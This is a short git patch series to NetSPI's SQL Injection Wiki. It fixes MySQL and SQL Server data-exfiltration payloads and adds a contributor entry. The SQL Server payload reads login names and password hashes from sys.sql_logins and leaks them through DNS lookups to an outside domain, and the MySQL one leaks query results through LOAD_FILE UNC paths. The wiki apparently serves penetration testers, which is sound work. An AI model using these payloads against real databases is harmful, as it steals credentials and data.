From 35322991c5ff1e6d96976634cd0907f2dc3ac6f9 Mon Sep 17 00:00:00 2001 From: Ian Williams Date: Fri, 19 Oct 2018 09:58:21 -0500 Subject: [PATCH 1/3] Fix MySQL DNS Request Add missing period. Works on NetSPI/SQLInjectionWiki#5. --- attackQueries/dataExfiltration/mysql.html | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/attackQueries/dataExfiltration/mysql.html b/attackQueries/dataExfiltration/mysql.html index b1d832f..8ea22f3 100644 --- a/attackQueries/dataExfiltration/mysql.html +++ b/attackQueries/dataExfiltration/mysql.html @@ -13,7 +13,7 @@

Data Exfiltration

DNS Request - SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), 'yourhost.com\\')) + SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), '.yourhost.com\\')) SMB Share From 3c25876387f796025573ceb327801ffefb7f2e21 Mon Sep 17 00:00:00 2001 From: Ian Williams Date: Fri, 19 Oct 2018 10:01:17 -0500 Subject: [PATCH 2/3] Fix SQL Server DNS request Add missing period. Works on NetSPI/SQLInjectionWiki#5. --- attackQueries/dataExfiltration/sqlserver.html | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/attackQueries/dataExfiltration/sqlserver.html b/attackQueries/dataExfiltration/sqlserver.html index 3bad19b..a813cce 100644 --- a/attackQueries/dataExfiltration/sqlserver.html +++ b/attackQueries/dataExfiltration/sqlserver.html @@ -13,7 +13,7 @@

Data Exfiltration

Make DNS Request - DECLARE @host varchar(800);
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;
exec('xp_fileexist "\' + @host + 'c$boot.ini"'); + DECLARE @host varchar(800);
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.netspi.com' from sys.sql_logins;
exec('xp_fileexist "\' + @host + 'c$boot.ini"'); UNC Path (DNS Request) From f20c70dd4fd076516426a56d9eb468f39a1d1ae0 Mon Sep 17 00:00:00 2001 From: Ian Williams Date: Fri, 19 Oct 2018 21:18:16 -0500 Subject: [PATCH 3/3] Add contributors entry https://github.com/NetSPI/SQLInjectionWiki/pull/6#issuecomment-431399072 Works on NetSPI/SQLInjectionWiki#5. --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index dcbefb1..8db78cc 100644 --- a/README.md +++ b/README.md @@ -14,6 +14,7 @@ See [CONTRIBUTING.md](https://github.com/NetSPI/WikiJekyllTheme/blob/master/CONT - Ben Tindell - Colin Salisbury - Eric Gruber (@egru) +- Ian Williams (@aph3rson) - Jake Reynolds (@jreynoldsdev) - Khai Tran (@k_tr4n) - Rafael Seferyan